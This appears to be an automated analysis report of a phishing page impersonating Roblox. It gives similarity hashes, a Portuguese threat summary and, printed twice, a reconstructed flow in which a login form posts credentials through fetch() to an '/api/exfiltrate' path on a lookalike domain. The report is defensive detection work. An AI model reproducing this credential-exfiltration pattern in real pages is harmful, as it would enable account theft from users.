Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1AA13B872A1246C33A1AFA3D9F515B70591D3EB0ECB425BE2A1F8A37609C9C71FD1341A |
|
CONTENT
ssdeep
|
768:4SiXB1WayLxjQEf6BbyJMP5rvrvEQ3ykHvBR5MF9NpBxJ8m8:4SiXB1xyLx0Ef6BLjMSrXK9NTxJ8m8 |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
b03031cfcfcc4c67 |
|
VISUAL
aHash
|
c3c7c3dfffffffff |
|
VISUAL
dHash
|
9e1e0e3e1a1a3002 |
|
VISUAL
wHash
|
02c383c3cfc3cfc3 |
|
VISUAL
colorHash
|
07047000040 |
|
VISUAL
cropResistant
|
9e1e0e3e1a1a3002,1c3b192d31b584d0 |
• Ameaça: Phishing por impersonificação
• Alvo: Usuários do Roblox
• Método: Falsificação de domínio e potencialmente Javascript malicioso
• Exfil: Desconhecido (potencialmente credenciais ou outros dados pessoais)
• Indicadores: Domínio incompatível, Javascript ofuscado, logotipo do Roblox presente
• Risco: ALTO
The attacker likely aims to steal user credentials. The site may display a fake login form or other form designed to collect sensitive data.
The obfuscated javascript might be used to collect data or redirect the user to a different site after inputting credentials.
User fills <input name='username'> → submitForm() → fetch('https://www.roblox.com.ml/api/exfiltrate') → credentials sent
User fills <input name='username'> → submitForm() → fetch('https://www.roblox.com.ml/api/exfiltrate') → credentials sent
EnvironmentUrls.jssubmitFormsendDataPages with identical visual appearance (based on perceptual hash)
Found 10 other scans for this domain